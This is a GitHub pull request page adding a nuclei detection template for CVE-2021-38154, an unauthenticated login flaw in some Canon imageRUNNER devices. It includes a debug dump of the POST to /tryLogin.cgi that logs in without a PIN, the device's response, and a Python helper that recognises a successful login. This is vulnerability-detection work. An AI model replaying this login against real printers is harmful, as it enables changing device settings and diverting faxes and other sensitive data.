@daffainfo
Contributor

Template / PR Information

Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2021-38154] Dumped HTTP request for http://REDACTED/tryLogin.cgi

POST /tryLogin.cgi HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

loginM=&0000=0011&0002=
[DBG] [CVE-2021-38154] Dumped HTTP response http://REDACTED/tryLogin.cgi

HTTP/1.1 303 See Other
Content-Length: 92
Content-Type: text/html
Content-Type: text/html
Location: http://REDACTED/portal_top.html
Set-Cookie: fusion-http-session-id=YPQJCVKPMJQBOXCTQHIT;Comment=;Version=;HttpOnly

<html><body><p>You should be redirected to the new location automatically.</p></body></html>
[CVE-2021-38154:dsl-1] [http] [high] http://REDACTED/tryLogin.cgi
[INF] Scan completed in 683.711834ms. 1 matches found.
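
A triage helper for the response shown in the debug output above, added here as an example and not part of the PR or the nuclei template. It assumes that a 303 redirect to portal_top.html together with a non-empty fusion-http-session-id cookie means the device accepted the General User Mode login without a PIN; the sample responses are constructed and login.html is a hypothetical path.

```python
from urllib.parse import urlsplit

# Constructed sample modelled on the response dump above (host redacted).
ACCEPTED = (
    "HTTP/1.1 303 See Other\r\n"
    "Content-Length: 92\r\n"
    "Content-Type: text/html\r\n"
    "Content-Type: text/html\r\n"
    "Location: http://REDACTED/portal_top.html\r\n"
    "Set-Cookie: fusion-http-session-id=EXAMPLESESSIONID;Comment=;Version=;HttpOnly\r\n"
    "\r\n<html></html>"
)
# Constructed counter-example: redirect to a hypothetical login page, no session issued.
REJECTED = "HTTP/1.1 303 See Other\r\nLocation: http://REDACTED/login.html\r\n\r\n"


def parse_response(raw):
    """Return (status_code, headers); headers maps lower-cased name -> list of values."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    parts = lines[0].split()
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            # Keep every occurrence: the device repeats headers (Content-Type above).
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def has_session_cookie(cookies):
    """True when a fusion-http-session-id cookie carries a non-empty value."""
    for cookie in cookies:
        name, _, value = cookie.split(";", 1)[0].strip().partition("=")
        if name == "fusion-http-session-id" and value:
            return True
    return False


def pinless_login_accepted(raw):
    """Assumed indicator: 303 to /portal_top.html plus a session cookie."""
    status, headers = parse_response(raw)
    to_portal = any(urlsplit(loc).path == "/portal_top.html"
                    for loc in headers.get("location", []))
    return status == 303 and to_portal and has_session_cookie(headers.get("set-cookie", []))
```

A device that returns the accepted shape should have a PIN set for General User Mode and its remote UI kept off untrusted networks.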

@daffainfo
Contributor Author

Reopen #13510

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Oct 10, 2025
@github-actions github-actions bot requested a review from pussycat0x October 10, 2025 10:54
@pussycat0x pussycat0x merged commit 61e4bcf into projectdiscovery:main Oct 11, 2025
4 checks passed
@algora-pbc

algora-pbc bot commented Oct 11, 2025

🎉🎈 @daffainfo has been awarded $200 by ProjectDiscovery! 🎈🎊
